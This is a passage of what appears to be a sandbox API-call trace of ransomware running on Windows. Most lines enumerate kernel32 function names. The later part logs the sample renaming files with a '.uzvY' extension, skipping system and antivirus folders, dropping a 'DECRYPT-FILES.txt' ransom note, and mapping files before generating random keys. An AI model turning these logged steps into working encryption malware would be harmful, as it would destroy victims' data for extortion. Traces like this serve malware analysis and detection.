lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.586] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.586] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.586] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.586] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.586] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.586] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.586] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.586] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.586] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.586] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.586] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.586] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.586] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.586] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.587] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.587] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.587] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.587] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.587] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.587] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.587] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.587] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.587] lstrlenA (lpString="DELETEATOM") returned 10 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.587] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.587] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.587] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.587] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.587] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.587] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.587] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.587] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.587] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.587] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.588] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.588] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.588] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.588] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.588] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.588] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.588] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.588] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.588] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.588] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.588] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.588] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.588] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.588] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.588] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.588] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.588] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.588] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.588] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.589] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.589] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.589] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.589] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.589] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.589] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.589] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.589] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.589] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.626] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.635] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.638] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.642] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.642] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.642] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.642] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.642] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.642] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.642] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.642] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm") returned 77 [0078.642] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.uzvY") returned 82 [0078.642] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.uzvY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.uzvy"), dwFlags=0x0) returned 1 [0078.643] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.643] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.643] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.644] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5db2c650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5db2c650, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5db78910, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x509b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 0 [0078.644] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.644] CloseHandle (hObject=0x448) returned 1 [0078.644] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0078.644] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0078.644] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0078.644] lstrcatW (in: lpString1="UProof", lpString2="\\" | out: lpString1="UProof\\") returned="UProof\\" [0078.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="UProof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Program Files") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch=":\\Windows") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Games\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\All Users") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.645] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="AhnLab") returned 0x0 [0078.645] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0078.645] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.645] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\jkbimi8.tmp") returned 75 [0078.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.681] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0078.682] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.682] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\DECRYPT-FILES.txt") returned 81 [0078.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.699] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.700] CloseHandle (hObject=0x44c) returned 1 [0078.700] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0078.700] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*" [0078.700] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xab1bc340, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1bc340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.701] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xab1bc340, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1bc340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.701] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.701] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.701] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="DECRYPT-FILES.txt") returned -1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="autorun.inf") returned 1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="boot.ini") returned 1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="desktop.ini") returned -1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntuser.dat") returned -1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="iconcache.db") returned -1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="bootsect.bak") returned 1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ntuser.dat.log") returned -1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="thumbs.db") returned -1 [0078.701] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Bootfont.bin") returned 1 [0078.701] lstrlenW (lpString="CUSTOM.DIC") returned 10 [0078.701] lstrcmpiW (lpString1="DIC", lpString2="lnk") returned -1 [0078.701] lstrcmpiW (lpString1="DIC", lpString2="exe") returned -1 [0078.701] lstrcmpiW (lpString1="DIC", lpString2="sys") returned -1 [0078.701] lstrcmpiW (lpString1="DIC", lpString2="dll") returned -1 [0078.701] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0078.701] lstrlenW (lpString="CUSTOM.DIC") returned 10 [0078.701] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0078.701] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="CUSTOM.DIC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" [0078.701] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.703] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=2) returned 1 [0078.703] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.703] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.704] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, 